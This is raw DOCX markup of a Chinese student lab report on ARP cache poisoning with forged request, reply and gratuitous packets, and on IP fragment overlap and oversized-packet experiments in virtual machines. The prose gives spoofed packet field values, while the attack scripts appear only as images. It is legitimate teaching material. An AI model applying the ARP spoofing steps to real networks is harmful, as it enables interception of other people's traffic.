            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="28" name="图片 28" descr="]BS(8MPCJ[)LPXL{U~D)SR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]BS(8MPCJ[)LPXL{U~D)SRV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可以看到，A的ARP缓存中成功将B的IP地址与M的MAC地址映射，ARP缓存污染攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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Task1B . using ARP reply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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在主机M上，构造ARP应答包并发送到主机A。检查A的ARP缓存中，M的MAC地址是否映射到B的IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Step1. 清除VM A上一个实验残留的ARP缓存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462905" cy="868045"/>
            <wp:effectExtent l="0" t="0" r="10795" b="8255"/>
            <wp:docPr id="32" name="图片 32" descr="_E%5M5`%9C6{VCZ)3D]B%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_E%5M5`%9C6{VCZ)3D]B%A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2905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  <w:t>Step2. 在VM M上写程序reply.py，构造一个ARP响应报文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200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响应报文的op选项设为2，表示为响应报文；源IP地址为B的IP地址，源MAC地址为M的MAC地址；目的IP地址为A的IP地址，目的MAC地址为A的MAC地址，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>伪装为A的ARP请求报文的响应报文，发送给A。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78760" cy="2508250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="40" name="图片 40" descr="]V7UF4LRO%%[IW%ZT]UAC6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]V7UF4LRO%%[IW%ZT]UAC6U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7876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b w:val="0"/>
          <w:bCs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  <w:t>Step3. 在VM A上用arp -a指令查看ARP缓存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69865" cy="1059180"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="39" name="图片 39" descr="F%UBMSVAQ}_$_S0DS5JDL[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F%UBMSVAQ}_$_S0DS5JDL[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可以看到，A的ARP缓存中成功将B的IP地址与M的MAC地址映射，ARP缓存污染攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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Task1C . using ARP gratuitous message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Step1. 在VM M上写程序gratuitous.py，构造一个ARP gratuitous请求报文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200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清楚VM A的ARP缓存后，在VM M上写程序，发送一个gratuitous请求报文。报文的op选项设为1，表示为请求报文；源IP地址为B的IP地址，源MAC地址为M的MAC地址；目的IP地址为B的IP地址，目的MAC地址为广播地址（ff:ff:ff:ff:ff:ff）。并且报文的以太网报头的目的MAC地址也设置为广播地址（ff:ff:ff:ff:ff:ff）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089275" cy="2914015"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985"/>
            <wp:docPr id="45" name="图片 45" descr="K0WS8GKVG}}$)RCIERWOC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K0WS8GKVG}}$)RCIERWOC0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8927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b w:val="0"/>
          <w:bCs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  <w:t>Step3. 在VM A上用arp -a指令查看ARP缓存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69230" cy="850900"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="46" name="图片 46" descr="W2KKSB~5`OGN65~A1V6P5T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W2KKSB~5`OGN65~A1V6P5TL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可以看到，A的ARP缓存中成功将B的IP地址与M的MAC地址映射，ARP缓存污染攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Part3——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP/ICMP Attacks Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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本part使用VM A（10.0.2.4）和VM M（10.0.2.6）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val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IP Fragmentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Task1A . using ARP request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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在此任务中，学生需要构造一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据包并将其发送到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器。 他们可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“nc -lu 9090”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器。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实验者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不需要构建一个IP数据包，而需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成3个片段，每个片段包含32个字节的数据(第一个片段包含8个字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>头加上32字节的数据)。如果所有操作都正确，服务器将总共显示96字节的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="20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  <w:t>Step1. 在VM A上编写UDP数据包构造程序task1.py，并且运行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task.py内容如下：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3926205" cy="3642360"/>
            <wp:effectExtent l="0" t="0" r="10795" b="2540"/>
            <wp:docPr id="3" name="图片 3" descr="%JZQWPL33KA@DFM5037NW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%JZQWPL33KA@DFM5037NWHY"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect l="120" b="646"/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  <w:t>Step2. 运行task1.py，在VM M上开启UDP服务器监听UDP报文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48530" cy="896620"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="4" name="图片 4" descr="SBEUJ$R9U[}0M{${)57@9P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BEUJ$R9U[}0M{${)57@9PU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853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如上图所示，VM M的UDP服务器可以收到来自VM A的IP报文，报文内容为31个A和一个“\n”，31个B和一个“\n”，31个C和一个“\n”，刚好96个字节，所以攻击成功。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Task1B . IP Fragments with Overlapping Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200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定义K为8。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Scenario1. 第一分片的末尾和第二分片的开头有K字节的重叠（即第一分片中最后K字节的数据应该与第二个分片的最开始K字节具有相同的偏移量）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假设K=8，第一个和第三个分片数据部分为32字节，第二个分片的数据部分为24节，UDP头部为8字节，总共三个分片。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>先发送第一个分片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果不修改UDP数据包的长度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77690" cy="4093210"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="22" name="图片 22" descr="31U$Z31IWGX@Q5$E$YEX0[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31U$Z31IWGX@Q5$E$YEX0[P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19405"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10795"/>
            <wp:docPr id="23" name="图片 23" descr="[H}E%2K3C9SJ~ZKWGC4BC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[H}E%2K3C9SJ~ZKWGC4BCPM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4"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于分片之间有重叠，所以在不修改UDP数据包不会交付给UDP服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果修改UDP数据包的长度（减去重叠部分长度）</w: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-188595</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>979170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2292985" cy="267970"/>
                <wp:effectExtent l="19050" t="19050" r="24765" b="3048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54405" y="2473960"/>
                          <a:ext cx="229298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4.85pt;margin-top:77.1pt;height:21.1pt;width:180.55pt;z-index:251765760;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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LZ/OQnYAAAACwEAAA8AAAAA&#10;AAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kBqpyXAvwIAAHIFAAAO&#10;AAAAAAAAAAEAIAAAACcBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAABYBgAAAAA=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4046220" cy="4125595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="51" name="图片 51" descr="OO8{WKXG6@6N07~R9E}3`)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OO8{WKXG6@6N07~R9E}3`)K"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect l="8306" t="16386" r="32682" b="1000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71135" cy="485140"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
            <wp:docPr id="48" name="图片 48" descr="_65KGJUY~(@%%@`DSMY7[_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_65KGJUY~(@%%@`DSMY7[_L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UDP服务器端丢弃分片2与分片1的重叠部分，把三个分片不重合的部分重组，所以打印结果为32个A和16个B和32个C。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>先发送第二个分片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果不修改UDP数据包的长度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23435" cy="4461510"/>
            <wp:effectExtent l="0" t="0" r="12065" b="8890"/>
            <wp:docPr id="25" name="图片 25" descr="TR5BJA1`3WI]{(L6VZCM{Z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TR5BJA1`3WI]{(L6VZCM{ZA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3435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340995"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
            <wp:docPr id="24" name="图片 24" descr="E}72QC@0~F12~O@])$2SLW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E}72QC@0~F12~O@])$2SLWR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由于分片之间有重叠，所以不会交付给UDP服务器。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两种发送顺序结果一样。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果修改UDP数据包的长度（减去重叠部分长度）</w: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-125095</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2279015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2292985" cy="267970"/>
                <wp:effectExtent l="19050" t="19050" r="24765" b="30480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98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9.85pt;margin-top:179.45pt;height:21.1pt;width:180.55pt;z-index:251982848;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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DnAkg72QAAAAsB&#10;AAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAoMQvG1MC&#10;AAB/BAAADgAAAAAAAAABACAAAAAoAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA7QUA&#10;AAAA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4067810" cy="4190365"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="53" name="图片 53" descr="%V8G5289C(JB%1PZ}ZZ]L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%V8G5289C(JB%1PZ}ZZ]LC6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect l="8571" t="16873" r="34961" b="11962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71135" cy="485140"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
            <wp:docPr id="47" name="图片 47" descr="_65KGJUY~(@%%@`DSMY7[_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_65KGJUY~(@%%@`DSMY7[_L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即使分片2先发送，但是由于分片2没有UDP头部，所以UDP服务器仍然将分片1视为第一个分片。UDP端依旧会丢弃分片2与分片1的重叠部分，把三个分片不重合的部分重组，所以打印结果为32个A和16个B和32个C。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Scenario2. 第二个分片完全被包含在第一个分片中（第二个分片的长度必须小于第一个分片）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假设第一个和第三个分片数据部分为32字节，第二个分片的数据部分为24节，UDP头部为8字节，总共三个分片。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（1）先发送第一个分片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果不修改UDP数据包的长度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02760" cy="4015105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10795"/>
            <wp:docPr id="56" name="图片 56" descr="2G`KK%`WGCVD`H5LKUM2X{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2G`KK%`WGCVD`H5LKUM2X{Q"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect l="398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7480" cy="290195"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="33" name="图片 33" descr=")AV8I`Z}]N)3IZKI`Y78]8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)AV8I`Z}]N)3IZKI`Y78]8W"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect r="662" b="21747"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="523748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UDP先收到了分片1，然后收到了与分片1有重叠的分片2，由于分片之间有重叠，所以不会交付给UDP服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果修改UDP数据包的长度（减去重叠部分长度）</w:t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-181610</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>989330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2292985" cy="267970"/>
                <wp:effectExtent l="19050" t="19050" r="24765" b="30480"/>
                <wp:wrapNone/>
                <wp:docPr id="57" name="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98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4.3pt;margin-top:77.9pt;height:21.1pt;width:180.55pt;z-index:252634112;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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FdHG8DYAAAACwEA&#10;AA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAp6SMIUwIA&#10;AH8EAAAOAAAAAAAAAAEAIAAAACcBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAADsBQAA&#10;AAA=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785235" cy="4197350"/>
            <wp:effectExtent l="0" t="0" r="12065" b="6350"/>
            <wp:docPr id="55" name="图片 55" descr="{MDZ86IA)B[RV61CNRX]@R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{MDZ86IA)B[RV61CNRX]@R4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect l="8849" t="16563" r="41386" b="15925"/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="383540"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10160"/>
            <wp:docPr id="49" name="图片 49" descr="8JVP_O71K`F(N(Z~ZL`[UQ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8JVP_O71K`F(N(Z~ZL`[UQ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由于分片2并没有UDP头，并且分片2被覆盖在分片1内，因而UDP服务器端丢弃分片2，只把分片1与分片3重组，所以打印结果为32个A和32个C。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（2）先发送第二个分片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果不修改UDP数据包的长度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10025" cy="3909060"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="58" name="图片 58" descr="96TZEN5(333HBT)I24W@1%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96TZEN5(333HBT)I24W@1%M"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="5316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2405" cy="370840"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
            <wp:docPr id="35" name="图片 35" descr=")AV8I`Z}]N)3IZKI`Y78]8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)AV8I`Z}]N)3IZKI`Y78]8W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highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于分片之间有重叠，所以不会交付给UDP服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>两种发送顺序结果一样。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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如果修改UDP数据包的长度（减去重叠部分长度）</w:t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>
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-139700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2051050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2292985" cy="267970"/>
                <wp:effectExtent l="19050" t="19050" r="24765" b="30480"/>
                <wp:wrapNone/>
                <wp:docPr id="60" name="矩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98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1pt;margin-top:161.5pt;height:21.1pt;width:180.55pt;z-index:255564800;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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JkBE2tgAAAALAQAA&#10;DwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQBVht7RSAgAA&#10;fwQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAOsFAAAA&#10;AA==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4105910" cy="4354195"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1905"/>
            <wp:docPr id="59" name="图片 59" descr="QBFC]D[~)UR~X$~7T`FK[`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QBFC]D[~)UR~X$~7T`FK[`L"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect l="8640" t="16726" r="37902" b="13923"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83540"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10160"/>
            <wp:docPr id="50" name="图片 50" descr="8JVP_O71K`F(N(Z~ZL`[UQ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8JVP_O71K`F(N(Z~ZL`[UQ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由于分片2并没有UDP头，并且分片2被覆盖在分片1内，所以即使先发分片2，UDP服务器端也依旧把分片1与分片3重组，所以打印结果为32个A和32个C。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Task1C . Sending a Super-Large Packet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构造一个有三个分片的IP报文，三个分片的数据长度分别为20000，20000,25600字节，将报文发送给UDP服务器。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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4371975" cy="4485005"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10795"/>
            <wp:docPr id="38" name="图片 38" descr="%CF7T7M2DF$ODZ93DM3JE)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%CF7T7M2DF$ODZ93DM3JE)M"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect l="410" t="31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在VM M（UDP服务器端）利用wireshark抓包，可以看到，由于数据链路层所能承受的最大传输单元（MTU）为1500字节，所以对于长度超过1500字节的IP分片，会自动将其拆分为更小的分片。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172710" cy="2239645"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8255"/>
            <wp:docPr id="37" name="图片 37" descr="@ZEBBY@2S~HC]0Q[EQ9Q][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@ZEBBY@2S~HC]0Q[EQ9Q][J"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect r="1749"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="51727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在传输层将所有分片整合后，发现整个UDP报文的长度已经大于UDP服务器端不会打印输出65535字节，超过了UDP的长度限制，所以UDP服务器端不会打印输出。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70840"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
